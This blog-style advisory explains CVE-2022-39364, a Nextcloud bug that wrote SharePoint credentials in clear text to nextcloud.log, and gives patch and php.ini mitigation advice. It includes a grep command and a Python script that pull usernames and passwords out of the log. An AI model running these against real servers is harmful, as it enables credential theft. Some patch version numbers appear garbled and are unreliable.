CVE-2022-39364 - How a Simple Log Leak in Nextcloud Exposed SharePoint Credentials

Nextcloud Server is a powerful open-source, self-hosted platform trusted by many for file sharing, productivity, and collaboration. But like all software, it's not immune to vulnerabilities. In 2022, a critical bug—tracked as CVE-2022-39364—was discovered that could allow attackers to capture sensitive SharePoint credentials from a simple server log file.

In this long-read post, we'll explain what CVE-2022-39364 is, show how an attacker could exploit it, and offer easy, practical mitigation tips—including official patches and a quick PHP configuration change. We’ll keep the language simple, make everything clear, and add unique insights you won't find in the official advisories.

What Is Nextcloud Server?

If you're new to Nextcloud: it's the engine behind many private cloud solutions. Businesses and privacy-focused users run it on their own servers so they can store, sync, and share files away from commercial cloud vendors. Nextcloud connects to many services, including Microsoft SharePoint, to pull files all into one place.

What Happened?

When you connect a SharePoint resource to Nextcloud, the Nextcloud Server logs connection attempts in a file called nextcloud.log. These log entries help with debugging—but by accident, they include credentials like usernames and passwords in clear text, not redacted.

Anyone who can read nextcloud.log (on the server or via a backup) can steal those credentials, then use them to access your SharePoint services. Not good.

Simply put: If you can read the log, you can steal the keys.

What Makes This Dangerous?

- Logs stick around: Attackers who compromise your server later can still find leftovers from old log entries.
- Logs may be copied: Insecure backups or admins with too many privileges can see the plain-text credentials.
- Password reuse: Many users reuse credentials across services. One exposed password could bring down several doors.

Step 1: Get Log File Access

An attacker who gains local access (maybe another user with SSH, a misconfigured backup script, or a web shell) looks for the Nextcloud log file, often at:

/var/www/nextcloud/data/nextcloud.log

Or, if you use a custom data directory

/path/to/nextcloud/data/nextcloud.log

Step 2: Search for SharePoint Credentials

The attacker searches for lines indicating SharePoint activity. A simple grep command does the trick:

grep 'sharepoint' /var/www/nextcloud/data/nextcloud.log

Let’s say the log included something like this

{
  "reqId":"abcdef12345",
  "level":3,
  "time":"2022-10-01T09:12:34+00:00",
  "remoteAddr":"192.168.1.33",
  "app":"files_external",
  "message":"Exception thrown while creating mount with arguments: 
    \"https://mysharepointsite\";, \"myuser\", \"SuperSecretPassword\""
}

Notice: The password SuperSecretPassword is right there!

Step 3: Offensive Use

The attacker can now log directly into your organization's SharePoint or test these credentials on other services if you reuse passwords.

Here’s a tiny Python script that finds SharePoint credentials in the log

import re

with open('/var/www/nextcloud/data/nextcloud.log') as log:
    for line in log:
        if 'sharepoint' in line:
            creds = re.findall(r'"(https?://[^"]+)", "([^"]+)", "([^"]+)"', line)
            for url, user, pwd in creds:
                print(f"Found SharePoint credentials: {user}@{url} with password: {pwd}")

What it does:
Looks for SharePoint log entries, grabs URL, username, and password, and prints them. Simple and effective.

How Did This Happen?

This bug happened because exception handling code in Nextcloud didn’t ignore the argument values when writing errors to the log. So, everything passed in—including things like passwords—got dumped into the log for troubleshooting.

Official Patch

If you’re running affected versions, upgrade immediately.

Update to at least 22.2.10.5, 23..9, or 24..5

> Official advisory:
> Nextcloud Security Advisory: NC-SA-2022-011
> GitHub CVE reference

Quick Workaround (if You Can’t Patch Immediately)

You can tell PHP to hide function arguments (like passwords) from exception traces, making logs safer.

Add this line to your php.ini

zend.exception_ignore_args = On

This sanitizes exception traces and keeps passwords out of logs.

Reference:
Zend PHP Documentation

Don’t assume logs are safe—sensitive data can leak almost anywhere.

- Regular updates and quick patching are critical, especially for internet-facing systems like Nextcloud.

Final Thoughts

A single overlooked log entry can undo all your careful security plans. CVE-2022-39364 is a reminder to review your software’s logging setup and keep up with patches. Nextcloud fixed this bug fast—make sure you update and tweak your PHP settings if you can’t patch right away.

For more info

- Nextcloud Security Advisory: GHSA-r6p6-g742-654m
- NVD CVE Detail: CVE-2022-39364

Timeline

Published on: 10/27/2022 15:15:00 UTC
Last modified on: 10/31/2022 14:26:00 UTC